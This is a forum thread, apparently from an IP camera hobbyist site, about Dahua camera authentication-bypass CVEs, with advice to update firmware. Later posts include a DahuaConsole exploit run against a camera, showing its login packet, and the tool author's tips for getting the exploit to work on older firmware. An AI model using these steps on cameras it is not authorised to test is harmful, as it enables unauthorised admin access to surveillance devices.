Dahua CVE-2021-33044; CVE-2021-33045

It seems to be the season for severe vulnerabilities being disclosed.
The Annke one was also pretty bad -

Annke N48PBB NVR vulnerability

If you have one of these on the Internet you might want to update. And reconsider having any IoT exposed to the internet in the first place :) https://www.nozominetworks.com/blog/new-annke-vulnerability-shows-risks-of-iot-security-camera-systems/
ipcamtalk.com ipcamtalk.com
 
  • Like
Reactions: bashis
alastairstevenson said:
It seems to be the season for severe vulnerabilities being disclosed.
The Annke one was also pretty bad -

Annke N48PBB NVR vulnerability

If you have one of these on the Internet you might want to update. And reconsider having any IoT exposed to the internet in the first place :) https://www.nozominetworks.com/blog/new-annke-vulnerability-shows-risks-of-iot-security-camera-systems/
ipcamtalk.com ipcamtalk.com
Click to expand...

Cool stuff, both these CVE will not give you RCE, but will give you Admin access to device if not using fixed FW, you should upgrade soonest. If no new FW can be found for your device one Dahua website (like many of my own), you should defiantly contact Dahua support and do official complain.
 
  • Like
Reactions: c hris527 and alastairstevenson
Ughhh
 
Hi. I tried DahuaConsole on some Alibi Security clones of Dahua cameras but was unsuccessful. The only ports that nmap reports are: 80, 81, 85, 554, 5060, and 49152.
Code: 
/DahuaConsole# ./Console.py --logon loopback --rhost 172.16.0.10  --rport 80 -d
[*] [Dahua Debug Console 2019-2021 bashis <mcw noemail eu>]
[*] logon type "loopback" with proto "dhip" at 172.16.0.10:80
[+] Opening connection to 172.16.0.10 on port 80: Done
[-] Dahua Debug Console: Failed
[-] Login: global.login [random]
[BEGIN SEND (172.16.0.10)] <------------------1801------------------>
20000000|44484950|00000000|00000000|91000000|00000000|91000000|00000000
{"method": "global.login", "params": {"userName": "admin", "password": "", "clientType": "Web3.0", "loginType": "Direct"}, "id": 0, "session": 0}
[ END  SEND (172.16.0.10)] <------------------1801------------------>
[*] Closed connection to 172.16.0.10 port 80
[-] [p2p] EOFError()
[*] All done

Of the examples on the Github, this was the only one that could connect to the camera. Does the p2p EOF error mean that the exploit won't work on my camera?

Thanks
 
swhomeautomation said:
Hi. I tried DahuaConsole on some Alibi Security clones of Dahua cameras but was unsuccessful. The only ports that nmap reports are: 80, 81, 85, 554, 5060, and 49152.
Code: 
/DahuaConsole# ./Console.py --logon loopback --rhost 172.16.0.10  --rport 80 -d
[*] [Dahua Debug Console 2019-2021 bashis <mcw noemail eu>]
[*] logon type "loopback" with proto "dhip" at 172.16.0.10:80
[+] Opening connection to 172.16.0.10 on port 80: Done
[-] Dahua Debug Console: Failed
[-] Login: global.login [random]
[BEGIN SEND (172.16.0.10)] <------------------1801------------------>
20000000|44484950|00000000|00000000|91000000|00000000|91000000|00000000
{"method": "global.login", "params": {"userName": "admin", "password": "", "clientType": "Web3.0", "loginType": "Direct"}, "id": 0, "session": 0}
[ END  SEND (172.16.0.10)] <------------------1801------------------>
[*] Closed connection to 172.16.0.10 port 80
[-] [p2p] EOFError()
[*] All done

Of the examples on the Github, this was the only one that could connect to the camera. Does the p2p EOF error mean that the exploit won't work on my camera?

Thanks
Click to expand...

Noted you missing the TCP/37777 port, sure it is Dahua clone?
You don't receive anything back from the device, thereof "[-] [p2p] EOFError()"

Can you login with the script at all on the device w/ valid credentials?
  • You could try some of these '--proto {dhip,dvrip,3des,http,https}'.
  • If it's old FW - older than 2017ish, you could try to add "magic":"0x1234" to all outgoing JSON in net.py : p2p() at 'packet.update({})'
 
  • Like
Reactions: iTuneDVR
You must log in or register to reply here.
Top Bottom